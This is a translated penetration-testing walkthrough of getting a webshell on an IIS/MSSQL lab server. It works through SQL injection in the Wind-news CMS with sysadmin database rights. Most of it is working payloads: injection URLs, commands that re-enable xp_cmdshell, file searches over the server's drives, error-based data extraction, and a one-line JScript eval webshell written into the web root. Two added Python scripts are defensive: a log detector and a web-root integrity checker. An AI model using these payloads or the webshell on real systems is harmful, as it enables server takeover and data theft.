The process of obtaining Webshell from MSSQL DBA Authority

Source: Internet
Author: User
Tags: dba, mssql

Objective

This article is a case study of obtaining a webshell through SQL injection when the MSSQL login has DBA (sysadmin) privileges and the web root path is unknown. The approach does not apply when the web server and the database server are separate machines.
The test environment was Windows 7 64-bit, SQL Server 2000, IIS 7.5, and the Wind-news CMS. The back-end admin area has several injection points; because this demo obtains the webshell purely through injection, the back-end file-upload route is not considered.

Process

First, locate the following injection point:

http://192.168.232.138:81/manage/news/newslist.aspx?Classid=1' and 1=user;--

Sqlmap confirms that the injected query runs with DBA privileges.

Create a temporary table

http://192.168.232.138:81/manage/news/newslist.aspx?Classid=1'; CREATE TABLE tt_tmp (tmp1 varchar(8000));--

Files can be located on Windows with the following command (the directory and pattern are placeholders):

 for /r <directory> %i in (<pattern>) do @echo %i

For example, to search the C: drive for newslist.aspx, use for /r c:\ %i in (Newslist*.aspx) do @echo %i or for /r c:\ %i in (Newslist.aspx*) do @echo %i

(Search results for: for /r c:\ %i in (Newslist*.aspx) do @echo %i)

Be sure to include a * wildcard in the pattern; otherwise the command enumerates every directory and simply appends your search string to each directory name.

(Search results for: for /r c:\ %i in (Newslist.aspx) do @echo %i)

Run the file search through xp_cmdshell and insert the results into the temporary table:

http://192.168.232.138:81/manage/news/newslist.aspx?Classid=1'; insert into tt_tmp(tmp1) exec master..xp_cmdshell 'for /r c:\ %i in (newslist*.aspx) do @echo %i';--

If xp_cmdshell cannot be executed and the following error is returned: SQL Server阻止了对组件‘xp_cmdshell’的过程‘sys.xp_cmdshell’的访问。因为此组件已作为此服务嚣安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用‘xp_cmdshell’。 (the English build of SQL Server reports this as "SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure.")

you can enable xp_cmdshell with the following statements:

'; EXEC sp_configure 'show advanced options', 1;  -- allow modification of advanced parameters
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;                -- enable the xp_cmdshell extended procedure
RECONFIGURE;--

Then execute the search command again.

After the search-and-insert step, the page response to ' and (select count(*) from tt_tmp)>1 tells you whether the search produced any results: when nothing was found, select count(*) from tt_tmp returns 1; otherwise it is greater than 1. If nothing was found, change the directory and try another drive letter, e.g. '; insert into tt_tmp(tmp1) exec master..xp_cmdshell 'for /r d:\ %i in (Newslist*.aspx) do @echo %i';-- . Sqlmap can also be used to view the row count.

The contents of the table can be displayed through error-based injection:

http://192.168.232.138:81/manage/news/newslist.aspx?Classid=2' and 1=(select top 1 tmp1 from tt_tmp) and 'a'='a

Keep extracting rows, excluding the ones already seen:

http://192.168.232.138:81/manage/news/newslist.aspx?Classid=2' and 1=(select top 1 tmp1 from tt_tmp where tmp1 not in ('c:\inetpub\wwwroot\manage\news\NewsList.aspx')) and 'a'='a

You can also use Sqlmap to read data directly from the table.
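From the defender's side, every step above (the stacked CREATE TABLE, the sp_configure call, the insert ... exec master..xp_cmdshell search, and the error-based probes) leaves a distinctive query string in the IIS log. The following detector is an added example written for this page, not code from the original article; the log lines are constructed in IIS W3C format with the same payload shapes the article shows, and the indicator names and regexes are the author's own choices.

```python
"""Scan IIS W3C log lines for the MSSQL stacked-query / xp_cmdshell injection
indicators that appear in this walkthrough (hypothetical detector, not part
of the article)."""
import re
from urllib.parse import unquote_plus

# Indicators drawn from the payload shapes shown in the article.
INDICATORS = {
    "xp_cmdshell": re.compile(r"xp_cmdshell", re.I),
    "sp_configure": re.compile(r"sp_configure|show\s+advanced\s+options", re.I),
    "stacked_ddl": re.compile(r";\s*(create|drop)\s+table\b", re.I),
    "insert_exec": re.compile(r"insert\s+into\s+\w+.*\bexec\b", re.I | re.S),
    "error_based_probe": re.compile(r"\band\s+1\s*=\s*\(?\s*(user|select)\b", re.I),
}

# Constructed sample log in IIS W3C format; these requests are invented for the demo.
SAMPLE_LOG = r"""#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2019-01-01 10:00:01 192.168.232.138 GET /manage/news/newslist.aspx Classid=1 81 192.168.232.1 200
2019-01-01 10:00:05 192.168.232.138 GET /manage/news/newslist.aspx Classid=1'+and+1%3Duser;-- 81 192.168.232.1 500
2019-01-01 10:00:09 192.168.232.138 GET /manage/news/newslist.aspx Classid=1';+CREATE+TABLE+tt_tmp+(tmp1+varchar(8000));-- 81 192.168.232.1 200
2019-01-01 10:00:20 192.168.232.138 GET /manage/news/newslist.aspx Classid=1';+EXEC+sp_configure+'xp_cmdshell',1;RECONFIGURE;-- 81 192.168.232.1 200
2019-01-01 10:00:31 192.168.232.138 GET /manage/news/newslist.aspx Classid=1';+insert+into+tt_tmp(tmp1)+exec+master..xp_cmdshell+'for+/r+c:\+%25i+in+(newslist*.aspx)+do+@echo+%25i';-- 81 192.168.232.1 200
2019-01-01 10:01:02 192.168.232.138 GET /manage/news/newslist.aspx Classid=2'+and+1%3D(select+top+1+tmp1+from+tt_tmp)+and+'a'%3D'a 81 192.168.232.1 500
2019-01-01 10:02:00 192.168.232.138 GET /index.aspx - 81 192.168.232.50 200
"""


def normalize(query: str) -> str:
    """URL-decode twice so double-encoded payloads and plain ones look alike."""
    return unquote_plus(unquote_plus(query))


def scan_line(line: str):
    """Return (uri_stem, client_ip, status, [indicator names]) or None for non-data lines."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) < 9:
        return None
    _date, _time, _s_ip, _method, stem, query, _port, c_ip, status = parts[:9]
    decoded = normalize("" if query == "-" else query)
    hits = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return stem, c_ip, status, hits


def scan_log(text: str):
    """Every request that matched at least one indicator."""
    return [r for r in map(scan_line, text.splitlines()) if r and r[3]]


def summarize(findings):
    """Per-client sorted list of indicator names, suitable for an alert or a block decision."""
    by_client = {}
    for _stem, c_ip, _status, hits in findings:
        by_client.setdefault(c_ip, set()).update(hits)
    return {ip: sorted(names) for ip, names in by_client.items()}


if __name__ == "__main__":
    findings = scan_log(SAMPLE_LOG)
    for stem, c_ip, status, hits in findings:
        print(f"{c_ip} {stem} status={status} indicators={','.join(hits)}")
    print(summarize(findings))
```

A single hit on xp_cmdshell or sp_configure from a web client is already worth an alert; the per-client summary shows the full chain (probe, DDL, configuration change, command execution) from one address, which is the pattern this article's procedure produces.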

From the paths returned, you can judge which directory is the web root. Then write a test file there and check whether it can be accessed over HTTP to confirm.

Here a txt file was written to the root directory; writing to another directory risks the file being unreachable because of missing access permissions.

http://192.168.232.138:81/manage/news/newslist.aspx?Classid=1'; EXEC master..xp_cmdshell 'echo Test >c:\\www\\2333.txt';--

Then visit http://192.168.232.138:81/2333.txt

Access succeeds, so next write a one-line shell:

http://192.168.232.138:81/manage/news/newslist.aspx?Classid=1'; EXEC master..xp_cmdshell 'echo ^<%@ page language="Jscript"%^>^<%eval(request.item["Pass"],"unsafe");%^> > C:\\www\\233.aspx';--

When a DOS command writes text containing < or > to a file, each of those characters must be prefixed with ^. The file is written successfully. The further steps that follow are not covered here.
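The two file writes above (a probe txt in the web root, then a new .aspx) are exactly what a baseline comparison of the web root catches. The following file-integrity check is an added example written for this page, not code from the article; it builds a constructed temporary web root so it runs offline, and the directory names and placeholder file contents are invented for the demo.

```python
"""Flag script files that appear or change under a web root relative to a
baseline snapshot (added example; not part of the original article)."""
import hashlib
import tempfile
from pathlib import Path

# Extensions IIS will execute or that change its behaviour; a new or changed file
# with one of these outside a planned deployment deserves review.
SCRIPT_SUFFIXES = {".aspx", ".asp", ".ashx", ".asmx", ".config"}


def snapshot(root):
    """Map relative POSIX path -> SHA-256 of content for every file under root."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in root.rglob("*")
        if p.is_file()
    }


def compare(baseline, current):
    """Diff two snapshots into added / removed / modified relative paths."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys() if baseline[k] != current[k]),
    }


def suspicious(report):
    """Added or modified files with an executable/config suffix, sorted for stable output."""
    return sorted(p for p in report["added"] + report["modified"]
                  if Path(p).suffix.lower() in SCRIPT_SUFFIXES)


def demo():
    """Build a constructed web root, take a baseline, simulate the drops from the
    article (a probe txt and a new .aspx in the root), and return the findings."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "manage" / "news").mkdir(parents=True)
        (root / "manage" / "news" / "NewsList.aspx").write_text("<%-- placeholder page --%>")
        (root / "index.html").write_text("<html>placeholder</html>")
        baseline = snapshot(root)

        # Simulated post-compromise state: the probe file and a new script appear,
        # and an existing page is edited. Contents are placeholders.
        (root / "2333.txt").write_text("Test")
        (root / "233.aspx").write_text("<%-- new file, contents irrelevant to the check --%>")
        (root / "manage" / "news" / "NewsList.aspx").write_text("<%-- placeholder page --%>\n<!-- edited -->")

        report = compare(baseline, snapshot(root))
        return report, suspicious(report)


if __name__ == "__main__":
    report, flagged = demo()
    print("added:", report["added"])
    print("modified:", report["modified"])
    print("review first:", flagged)
```

On a real server the baseline is taken right after a deployment and stored off-box, and compare runs on a schedule; the probe txt shows up in "added" as well, but the .aspx entries are the ones to look at first because IIS will execute them.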

Summary:

There are three small points of knowledge here:

1. How an sa user can enable xp_cmdshell

EXEC sp_configure 'show advanced options', 1;  -- allow modification of advanced parameters
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;            -- enable the xp_cmdshell extended procedure
RECONFIGURE;

2. How to search for files under Windows using DOS

 for /r <directory> %i in (<pattern>) do @echo %i
 for /r c:\ %i in (Newslist*.aspx) do @echo %i

3. How to handle < and > when a DOS command writes a file

Prefix each < and > with ^ (that is, write ^< and ^>) when echoing the text into a file such as 123.txt.

